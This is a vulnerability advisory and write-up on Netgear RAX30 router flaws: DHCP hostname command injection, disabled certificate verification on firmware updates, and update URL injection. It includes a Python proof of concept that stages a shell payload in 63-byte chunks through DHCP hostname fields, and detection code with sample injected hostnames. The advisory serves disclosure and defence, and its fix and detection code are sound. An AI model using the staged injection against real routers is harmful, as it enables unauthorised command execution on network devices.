Full Report
The authors of this post are from STAR Labs, a regular team at Pwn2Own. They detail several cool vulnerabilities in a Netgear router that were patched shortly before the event.

From the LAN side, many services are exposed, including UPnP, hostapd, SMB and others. By reverse engineering one of the binaries in Ghidra, they discovered that the DHCP hostname field is passed into a shell command, giving a command injection. However, they are only given 63 bytes to work with. One thing I would have considered doing is repeatedly appending to a file until the payload is complete, then executing it once it is all there. In this case, they simply created a file. Sadly, this was fixed: the fix used execve instead of system, and they did a good job fixing this issue.

While reviewing the device, they noticed a plethora of outbound connections to several Netgear domains on the WAN interface. One of the domains is responsible for checking for firmware updates. When using the curl library to make these requests, two crucial settings are turned off: CURLOPT_SSL_VERIFYHOST and CURLOPT_SSL_VERIFYPEER. Since certificate verification is turned off, an attacker on the upstream network can set up a fake DHCP and DNS server and impersonate the update server. The firmware is likely signed, but the point is that this opens up an entirely new attack avenue! When performing the firmware update, several requests are made to the update server, and one of the responses carries a URL for downloading files. This input is vulnerable to command injection as well. This was also fixed by using execve instead of system. What is strange about this fix is that it is NOT complete: the root cause of the problem is the lack of certificate verification, so the patch was not sufficient, and a malicious firmware image can still be sent to the device. The caveat is that the bug can only be exploited once per day (lolz).

Overall, a trivial list of bugs in the Netgear router. Interesting to see such bad bugs inside such a popular product though.
Analysis Summary
# Vulnerability: Multiple Command Injections and Broken Trust via Netgear RAX30 Services
## CVE Details
- **CVE ID**: Not explicitly numbered in the provided text (pre-emptively patched before Pwn2Own Toronto 2022). Referenced as "Netgear RAX30 LAN/WAN Bugs."
- **CVSS Score**: Estimated 8.8 (High) for the LAN vector to 9.8 (Critical) for the WAN vector; no official score is given in the referenced post.
- **CWE**:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- CWE-295: Improper Certificate Validation
## Affected Systems
- **Products**: Netgear RAX30 Router
- **Versions**: Firmware before 1.0.7.78, the release referenced below that replaced the `system()` calls; the certificate-validation weakness remains in that release.
- **Configurations**: Default LAN exposure for DHCP; WAN exposure for automated firmware update checks.
## Vulnerability Description
Security researchers identified a chain of vulnerabilities affecting both the Local Area Network (LAN) and Wide Area Network (WAN) interfaces:
1. **DHCP Hostname Injection (LAN)**: The `dhcpd` service fails to sanitize the client-supplied hostname (DHCP option 12, `DHCP_HOST_NAME`) from a `DHCPREQUEST` packet. The field is interpolated into a command line handed to `system()`, allowing arbitrary command execution. The hostname buffer is 63 bytes, so a payload longer than that has to be staged, for example appended to a file across several DHCP exchanges and then executed.
2. **Improper SSL Validation (WAN)**: The firmware update mechanism uses the `curl` library with `CURLOPT_SSL_VERIFYHOST` and `CURLOPT_SSL_VERIFYPEER` disabled, so the router accepts any certificate, including a self-signed one presented by a Man-In-The-Middle (MITM) attacker impersonating the Netgear update servers.
3. **Firmware Update URL Injection (WAN)**: During the update process, the download URL returned by the update server is passed to the `pegaSystem` function (a wrapper for `system()`) without sanitization, giving a second command injection that anyone impersonating the update server can trigger.
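The following Python is an added example, not code from the STAR Labs post or from the router firmware. It models the constraint in item 1: a `system()`-style sink that only ever sees 63 bytes of hostname per DHCP exchange, and a multi-stage delivery that appends `printf` chunks to a file and finally runs it. The injection framing (a leading `;` that ends the sink's own command and a trailing `;#` that comments out its tail), the stage file name and the `echo`-based stand-in sink are assumptions; the post does not describe the real command line. It also builds a minimal DHCPREQUEST carrying option 12, so each stage is checked against a real packet layout rather than a bare string.

```python
import os
import struct
import subprocess
import tempfile

HOSTNAME_LIMIT = 63   # hostname bytes the sink accepts, per the write-up


def printf_escape(data: bytes) -> str:
    """Encode bytes for use inside a single-quoted printf FORMAT argument.
    Quote, backslash and percent are escaped; anything non-printable becomes a
    POSIX octal escape (\\NNN) that dash, busybox sh and bash all understand."""
    out = []
    for c in data:
        if c == 0x27:                 # ' -> close quote, escaped quote, reopen
            out.append("'\\''")
        elif c == 0x5C:               # backslash
            out.append("\\\\")
        elif c == 0x25:               # percent (printf conversion character)
            out.append("%%")
        elif 0x20 <= c < 0x7F:
            out.append(chr(c))
        else:
            out.append("\\%03o" % c)
    return "".join(out)


def build_stages(script, path, limit=HOSTNAME_LIMIT, prefix=";", suffix=";#"):
    """Split `script` (bytes) into shell commands of at most `limit` bytes that
    append it chunk by chunk to `path`, then one command that runs it. The
    framing is an assumption: `prefix` terminates the sink's own command and
    `suffix` comments out whatever the sink appends after the hostname."""
    head = f"{prefix}printf '"
    tail = f"'>>{path}{suffix}"
    budget = limit - len(head) - len(tail)
    if budget < 4:                    # a single byte can cost 4 chars ('\'')
        raise ValueError("stage file path leaves no room for payload bytes")
    stages, chunk, used = [], [], 0
    for c in script:
        enc = printf_escape(bytes([c]))
        if used + len(enc) > budget:
            stages.append(head + "".join(chunk) + tail)
            chunk, used = [], 0
        chunk.append(enc)
        used += len(enc)
    if chunk:
        stages.append(head + "".join(chunk) + tail)
    stages.append(f"{prefix}sh {path}{suffix}")
    if any(len(s.encode()) > limit for s in stages):
        raise RuntimeError("stage exceeds hostname limit")
    return stages


def dhcp_request(mac: bytes, hostname: str, xid: int = 0x3903F326) -> bytes:
    """Minimal BOOTP/DHCPREQUEST (RFC 2131/2132) with the hostname as option 12."""
    host = hostname.encode()
    if len(host) > 255:
        raise ValueError("option 12 length field is one byte")
    fixed = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                        1, 1, 6, 0, xid, 0, 0x8000,   # BOOTREQUEST, Ethernet, broadcast
                        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,
                        mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    options = (b"\x63\x82\x53\x63"                     # magic cookie
               + bytes([53, 1, 3])                     # message type: DHCPREQUEST
               + bytes([12, len(host)]) + host         # option 12: host name
               + b"\xff")                              # end
    return fixed + options


def hostname_from_request(pkt: bytes) -> str:
    """Walk the option list (offset 240 = 236-byte fixed header + cookie) for option 12."""
    i = 240
    while i < len(pkt) and pkt[i] != 0xFF:
        code, ln = pkt[i], pkt[i + 1]
        if code == 12:
            return pkt[i + 2:i + 2 + ln].decode()
        i += 2 + ln
    return ""


def vulnerable_sink(hostname: str, cwd: str) -> None:
    """Stand-in for the system()-style sink: the hostname is spliced, unquoted,
    into a shell command line run in `cwd`. An assumption, not the router's code."""
    subprocess.run("echo " + hostname, shell=True, check=True, cwd=cwd,
                   stdout=subprocess.DEVNULL)


def run_demo(workdir=None) -> dict:
    """Deliver a script longer than the limit, one stage per DHCP packet, through
    the stand-in sink; return the stages and what the rebuilt script wrote when
    it ran. The script exercises quote, percent, backslash and non-ASCII escaping."""
    workdir = workdir or tempfile.mkdtemp()
    script = b"printf '%s\\n' \"it's 100% done\" > out\n# \xc3\xa9\n"
    stages = build_stages(script, "s")
    for stage in stages:
        pkt = dhcp_request(b"\x00\x11\x22\x33\x44\x55", stage)
        vulnerable_sink(hostname_from_request(pkt), workdir)
    with open(os.path.join(workdir, "s"), "rb") as fh:
        rebuilt_ok = fh.read() == script
    with open(os.path.join(workdir, "out"), "rb") as fh:
        output = fh.read()
    return {"stages": stages, "max_len": max(len(s) for s in stages),
            "rebuilt_ok": rebuilt_ok, "output": output}
```

`run_demo()` is enough to see the mechanism end to end: a 42-byte script needs two `printf` stages plus the `sh` stage once escaping overhead is counted, and every stage stays at or under 63 bytes. The octal encoding is what makes the chunks safe to cut anywhere: each byte of the payload is an atomic unit in the stage, so a split never lands inside an escape sequence.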
## Exploitation
- **Status**: PoC available (developed by STAR Labs for Pwn2Own).
- **Complexity**: Low to Medium.
- **Attack Vector**:
- **LAN**: Adjacent (requires connection to the local network).
- **WAN**: Network, but only from a MITM position on the router's upstream path (for example a rogue DHCP/DNS server on the WAN segment); the update check runs once per day, so there is one trigger opportunity per day.
## Impact
- **Confidentiality**: High (Full system access)
- **Integrity**: High (Ability to flash malicious firmware images)
- **Availability**: High (Device rebooting and potential bricking)
## Remediation
### Patches
- Netgear released firmware 1.0.7.78 (the KB article in the references) before Pwn2Own Toronto 2022, which removed the command-injection sinks.
- **Method of Fix**: The vendor replaced the `system()` calls with `execve()`, so the hostname and the download URL are passed as discrete arguments instead of being parsed by a shell. The fix does not enable certificate verification on the update channel, so an attacker who can impersonate the update server can still deliver a firmware image of their choosing.
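As an added illustration of the fix (a Python analogue, not the vendor's code), the block below contrasts the two invocation patterns: `subprocess.run(cmd, shell=True)` is the `system()` pattern, since it runs `/bin/sh -c cmd`, and `subprocess.run([prog, arg, ...])` is the `execve()` pattern, where argv goes straight to the kernel. `echo` stands in for whatever helper the router really invokes, which the write-up does not name. It also shows the caveat a reviewer should raise about an `execve()`-only fix: the child program still parses its own argv, so a hostname beginning with `-` can be taken as an option, and only input validation closes that.

```python
import re
import subprocess

HOSTNAME_LIMIT = 63          # size of the device's hostname buffer, per the write-up
_LABEL = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def hook_via_shell(hostname: str) -> str:
    """Vulnerable: the hostname is spliced into a command line that /bin/sh parses,
    so ';', '`', '$(...)', '|' and redirections are interpreted."""
    return subprocess.run("echo " + hostname, shell=True,
                          capture_output=True, text=True).stdout


def hook_via_argv(hostname: str) -> str:
    """Patched pattern: one argv element, no shell, so metacharacters pass through
    literally. Caveat: the child still parses its argv, so a value beginning with
    '-' can be taken as an option (argument injection); execve() alone does not
    prevent that."""
    return subprocess.run(["echo", hostname], capture_output=True, text=True).stdout


def validate_hostname(hostname: str, limit: int = HOSTNAME_LIMIT) -> str:
    """Allow-list check for what a DHCP client hostname should look like: RFC 1123
    labels separated by dots, at most `limit` bytes. Anything else is rejected,
    which also closes the '-option' gap left open by execve() alone."""
    if not 0 < len(hostname.encode()) <= limit:
        raise ValueError("hostname length must be 1..%d bytes" % limit)
    if not all(_LABEL.match(label) for label in hostname.split(".")):
        raise ValueError("hostname has characters outside RFC 1123")
    return hostname


def hook_hardened(hostname: str) -> str:
    """execve()-style call plus input validation: the two together are the fix."""
    return hook_via_argv(validate_hostname(hostname))


def rejected(hostname: str) -> bool:
    """True if the hardened hook refuses `hostname` before running anything."""
    try:
        hook_hardened(hostname)
    except ValueError:
        return True
    return False
```

`hook_via_shell("host; echo INJECTED")` prints two lines because the shell split the command; `hook_via_argv` with the same input prints the metacharacters literally, which is what the `execve()` change buys. `hook_via_argv("-n")` prints nothing at all, because `echo` consumed the hostname as its own option: the same class of problem as the original sink, just one layer down, and the reason the allow-list in `validate_hostname` belongs in front of the call.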
### Workarounds
- **Avoid the Automatic Check**: Check for and install firmware updates manually from a trusted network rather than relying on the daily automatic check, which is the WAN-side MITM window.
- **Access Control**: Restrict the LAN (wired and Wi-Fi) to trusted devices, since any client that can complete a DHCP exchange can supply the hostname.
## Detection
- **Indicators of Compromise**:
- Netgear update hostnames resolving to unexpected addresses, or the router's WAN lease handing it an unexpected DNS server, during firmware update checks.
- DHCP server logs showing hostnames that are malformed, at the 63-byte limit, or contain shell metacharacters (e.g., `;`, `` ` ``, `$()`), in particular a burst of DHCP exchanges from one client with changing hostnames (payload staging).
- **Detection Methods**: The router never validates the server, so interception is invisible from the device itself; capture the TLS handshakes from the router to `netgear.com` subdomains upstream and check that the presented certificate chains to a public CA for the expected hostname, and compare the DNS answers with those from an independent resolver.
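The following Python is an added example of the DHCP-side indicators above run over a constructed log sample (dnsmasq-style syslog lines written for this example, not real RAX30 logs). Beyond the metacharacter and length checks the list names, it adds one heuristic that follows from the 63-byte limit: a client that has to stage its payload shows up as several DHCP exchanges from one MAC with different hostnames inside a short window. The log format, MAC addresses and thresholds are assumptions; adapt the regex to whatever DHCP server actually writes the logs.

```python
import re
from collections import defaultdict

# Constructed sample (not real device logs). The three lines from 66:77:88:99:aa:bb
# mimic staged delivery of an injected payload through the hostname; the line from
# 12:34:56:78:9a:bc carries a hostname that exactly fills a 63-byte buffer.
SAMPLE_LOG = "\n".join([
    "Dec  3 10:00:01 gw dnsmasq-dhcp[811]: DHCPACK(br0) 192.168.1.20 00:11:22:33:44:55 laptop-01",
    "Dec  3 10:00:05 gw dnsmasq-dhcp[811]: DHCPACK(br0) 192.168.1.21 66:77:88:99:aa:bb ;printf 'id'>>/tmp/s;#",
    "Dec  3 10:00:06 gw dnsmasq-dhcp[811]: DHCPACK(br0) 192.168.1.21 66:77:88:99:aa:bb ;printf '\\012'>>/tmp/s;#",
    "Dec  3 10:00:07 gw dnsmasq-dhcp[811]: DHCPACK(br0) 192.168.1.21 66:77:88:99:aa:bb ;sh /tmp/s;#",
    "Dec  3 10:00:30 gw dnsmasq-dhcp[811]: DHCPACK(br0) 192.168.1.22 cc:dd:ee:ff:00:11 phone-$(id)",
    "Dec  3 10:01:00 gw dnsmasq-dhcp[811]: DHCPACK(br0) 192.168.1.23 12:34:56:78:9a:bc " + "a" * 63,
    "Dec  3 10:02:00 gw dnsmasq-dhcp[811]: DHCPACK(br0) 192.168.1.24 de:ad:be:ef:00:01 my_printer",
    "Dec  3 10:05:00 gw dnsmasq-dhcp[811]: DHCPACK(br0) 192.168.1.25 de:ad:be:ef:00:02 printer",
])

# dnsmasq prints the client hostname as the trailing field of a DHCPACK line.
ACK_RE = re.compile(r"^\w{3}\s+\d+ (\d\d):(\d\d):(\d\d) \S+ dnsmasq-dhcp\[\d+\]: "
                    r"DHCPACK\(\S+\) (\S+) ([0-9a-f:]{17}) (.*)$")
SHELL_META = re.compile(r"[;|&`$<>(){}]")            # what a system() sink would act on
HOSTNAME_OK = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
                         r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def parse(log_text: str) -> list:
    """Extract (seconds-of-day, ip, mac, hostname) from each DHCPACK line."""
    events = []
    for line in log_text.splitlines():
        m = ACK_RE.match(line)
        if m:
            hh, mm, ss, ip, mac, host = m.groups()
            events.append({"t": int(hh) * 3600 + int(mm) * 60 + int(ss),
                           "ip": ip, "mac": mac, "host": host})
    return events


def analyze(log_text: str, limit: int = 63, window: int = 60, burst: int = 3) -> list:
    """Return (kind, mac, detail) findings: hostnames with shell metacharacters,
    hostnames that are not RFC 1123, hostnames at or above the device's buffer
    limit, and `burst` or more distinct hostnames from one MAC within `window` s."""
    events = parse(log_text)
    findings = []
    for e in events:
        h = e["host"]
        if SHELL_META.search(h):
            findings.append(("shell-metachar", e["mac"], h))
        elif not HOSTNAME_OK.match(h):
            findings.append(("invalid-hostname", e["mac"], h))
        if len(h.encode()) >= limit:
            findings.append(("at-buffer-limit", e["mac"], h))
    by_mac = defaultdict(list)
    for e in events:
        by_mac[e["mac"]].append(e)
    for mac, evs in by_mac.items():
        evs.sort(key=lambda x: x["t"])
        for i, first in enumerate(evs):
            names = {x["host"] for x in evs[i:] if x["t"] - first["t"] <= window}
            if len(names) >= burst:
                findings.append(("hostname-burst", mac,
                                 "%d hostnames within %ds" % (len(names), window)))
                break
    return findings
```

On the sample, `analyze(SAMPLE_LOG)` flags the four metacharacter hostnames, the underscore hostname as malformed, the 63-byte hostname as sitting at the buffer limit, and the staging client as a hostname burst. The burst heuristic is the most portable of the four: it needs no knowledge of the sink's syntax, only the observation that a 63-byte budget forces an attacker to come back more than once.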
## References
- Netgear Support: [https://kb.netgear.com/000064989/RAX30-Firmware-Version-1-0-7-78](https://kb.netgear.com/000064989/RAX30-Firmware-Version-1-0-7-78)
- STAR Labs Blog: [https://starlabs.sg/blog/2022/12-the-last-breath-of-our-netgear-rax30-bugs-a-tragic-tale-before-pwn2own-toronto-2022/](https://starlabs.sg/blog/2022/12-the-last-breath-of-our-netgear-rax30-bugs-a-tragic-tale-before-pwn2own-toronto-2022/)
- Netgear GPL Source: [https://kb.netgear.com/2649/NETGEAR-Open-Source-Code-for-Programmers-GPL](https://kb.netgear.com/2649/NETGEAR-Open-Source-Code-for-Programmers-GPL)